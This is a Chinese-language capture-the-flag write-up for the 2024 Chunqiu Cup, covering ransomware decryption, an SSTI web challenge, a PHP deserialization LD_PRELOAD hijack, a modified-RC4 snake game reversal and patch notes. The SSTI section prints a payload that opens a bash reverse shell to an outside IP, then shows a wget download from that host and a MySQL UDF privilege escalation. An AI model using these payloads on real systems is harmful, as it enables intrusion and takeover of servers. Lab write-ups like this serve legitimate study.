2024 春秋杯

花点时间看了点题目 还是很好玩的 最后有点事情出去了 awdp最后一题没看 回头空了看看

初探勒索病毒

按照要求复现即可

image-20240705192800301

运行三条命令

1
2
3
sed -i 's/flags/"flags"/' ./decryptblocks.py
export SRL_IGNORE_MAGIC=1
./decryptblocks.py ./banana.jpg.sah28vut5 ./key.block

cp改一下后缀 得到flag

image-20240705194212886

brother

一眼ssti注入

image-20240705194449321

随便找一个payload 弹个shell出来看看

1
{%for(x)in().__class__.__base__.__subclasses__()%}{%if%27war%27in(x).__name__%20%}{{x()._module.__builtins__[%27__import__%27](%27os%27).popen(%27bash -c 'bash -i >& /dev/tcp/111.229.202.164/1145 0>%261'%27).read()}}{%endif%}{%endfor%}

成功弹上shell

随便逛逛 注意到有api.py

image-20240705200915252

注意到给了sql账号密码

1
2
3
4
5
6
config = {
    'user': 'ctf',
    'password': '123456',
    'host': '127.0.0.1',
    'database': 'mysql',
    'port': 6666 }

登录

1
mysql -h 127.0.0.1 -P 6666 -u ctf -p

下载udf提权需要的sh文件

1
mysql -u ctf -P 6666 -p123456 -e "SELECT {省略so文件内容} INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';"

没有curl 有wget

1
wget http://111.229.202.164:8080/1.sh

进行udf提权

image-20240705210234037

成功写入 

1
mysql -h 127.0.0.1 -P 6666 -u ctf -p -e "select sys_eval('cat /flag');"

image-20240705210528987

image-20240705210901798

得到flag

Hijack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
class ENV{
    public $key;
    public $value;
    public $math;

}
class DIFF{
    public $callback;
    public $back;
    public $flag;


}
class FILE{
    public $filename;
    public $enviroment;

    }
class FUN{
    public $fun;
    public $value;
}
$test = new ENV();
$test->math= new DIFF();
$test->math->flag=true;
$test->math->callback=new FILE();
$test->math->callback->enviroment=new ENV();
$test->math->callback->enviroment->key="LD_PRELOAD";
$test->math->callback->enviroment->value="/tmp/2801468f13fd0791a6ccd9d73b87747e.so";
// $test->math->callback=new FUN();
// $test->math->callback->fun=new FILE();
// $test->math->callback->fun->filename="poc.so";
// $test->math->callback->value="so文件的内容";
echo(serialize($test));
// echo 1;
?>

写入一个so文件 然后吧用putenv函数劫持LD_PRELOAD即可

这里写了个马进去

image-20240706152450213

snake

ida直接逆 看出来是python写的 工具逆向

image-20240706153756404

在线反编译一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.8

import pygame
import random
import key

def initialize(key):
    key_length = len(key)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % key_length]) % 256
        S[i] = S[j]
        S[j] = S[i]
    return S


def generate_key_stream(S, length):
    i = 0
    j = 0
    key_stream = []
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i] = S[j]
        S[j] = S[i]
        key_stream.append(S[(S[i] + S[j]) % 256])
    return key_stream


def decrypt(data, key):
    S = initialize(key)
    key_stream = generate_key_stream(S, len(data))
    decrypted_data = None((lambda .0 = None: [ i ^ data[i] ^ key_stream[i] for i in .0 ])(range(len(data))))
    return decrypted_data

pygame.init()
WINDOW_WIDTH = 800
WINDOW_HEIGHT = 600
SNAKE_SIZE = 20
SNAKE_SPEED = 20
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
pygame.display.set_caption('贪吃蛇')
font = pygame.font.Font(None, 36)
snake = [
    (200, 200),
    (210, 200),
    (220, 200)]
snake_direction = (SNAKE_SPEED, 0)
food = ((random.randint(0, WINDOW_WIDTH - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE, (random.randint(0, WINDOW_HEIGHT - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE)
key_bytes = bytes((lambda .0: [ ord(char) for char in .0 ])(key.xor_key))
data = [
    101,
    97,
    39,
    125,
    218,
    172,
    205,
    3,
    235,
    195,
    72,
    125,
    89,
    130,
    103,
    213,
    120,
    227,
    193,
    67,
    174,
    71,
    162,
    248,
    244,
    12,
    238,
    92,
    160,
    203,
    185,
    155]
decrypted_data = decrypt(bytes(data), key_bytes)
running = True
if running:
    window.fill(BLACK)
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
        elif event.type == pygame.KEYDOWN or event.key == pygame.K_UP:
            snake_direction = (0, -SNAKE_SPEED)
        elif event.key == pygame.K_DOWN:
            snake_direction = (0, SNAKE_SPEED)
        elif event.key == pygame.K_LEFT:
            snake_direction = (-SNAKE_SPEED, 0)
        elif event.key == pygame.K_RIGHT:
            snake_direction = (SNAKE_SPEED, 0)
            continue
            snake_head = (snake[0][0] + snake_direction[0], snake[0][1] + snake_direction[1])
            snake.insert(0, snake_head)
            snake.pop()
            if snake[0] == food:
                food = ((random.randint(0, WINDOW_WIDTH - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE, (random.randint(0, WINDOW_HEIGHT - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE)
                snake.append(snake[-1])
    if snake[0][0] < 0 and snake[0][0] >= WINDOW_WIDTH and snake[0][1] < 0 and snake[0][1] >= WINDOW_HEIGHT or snake[0] in snake[1:]:
        running = False
    for segment in snake:
        pygame.draw.rect(window, WHITE, (segment[0], segment[1], SNAKE_SIZE, SNAKE_SIZE))
    pygame.draw.rect(window, RED, (food[0], food[1], SNAKE_SIZE, SNAKE_SIZE))
    score_text = font.render(f'''Score: {len(snake)}''', True, WHITE)
    speed_text = font.render(f'''Speed: {SNAKE_SPEED}''', True, WHITE)
    window.blit(score_text, (10, 10))
    window.blit(speed_text, (10, 40))
    score = len(snake)
    if score >= 9999:
        flag_text = font.render('Flag: ' + decrypted_data.decode(), True, WHITE)
        window.blit(flag_text, (10, 70))
    pygame.display.update()
    pygame.time.Clock().tick(10)
    continue
pygame.quit()

key在key.py里面

1
2
3
4
5
6
# uncompyle6 version 3.9.1
# Python bytecode version base 3.8.0 (3413)
# Decompiled from: Python 3.6.12 (default, Feb  9 2021, 09:19:15) 
# [GCC 8.3.0]
# Embedded file name: key.py
xor_key = "V3rY_v3Ry_Ez"

rc4魔改了 多异或一个i

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
def initialize(key):
    key_length = len(key)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % key_length]) % 256
        S[i], S[j] = S[j], S[i]
    return S
def generate_key_stream(S, length):
    i = 0  j = 0
    key_stream = []
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        key_stream.append(S[(S[i] + S[j]) % 256])
    return key_stream
def decrypt(data, key):
    S = initialize(key)
    key_stream = generate_key_stream(S, len(data))
    decrypted_data = bytes((lambda ii = bytes: [ i ^ data[i] ^ key_stream[i] for i in ii ])(range(len(data))))
    return decrypted_data

key="V3rY_v3Ry_Ez"
key_bytes = bytes([ord(char) for char in key])
data = [
    101,
    97,
    39,
    125,
    218,
    172,
    205,
    3,
    235,
    195,
    72,
    125,
    89,
    130,
    103,
    213,
    120,
    227,
    193,
    67,
    174,
    71,
    162,
    248,
    244,
    12,
    238,
    92,
    160,
    203,
    185,
    155]
decrypted_data = decrypt(bytes(data), key_bytes)
print(decrypted_data)

image-20240706155418407

simplegoods

fix

攻击方式应该是上传文件然后包含 吧包含的地方直接注释掉就行

image-20240706152738042

ezSpring

fix

主要攻击思路就是spring security6x权限绕过 /admin/lookup/123%0d

打lookup java17高版本jndi注入 打jackson反序列化链子就行

只要把lookup注释掉就行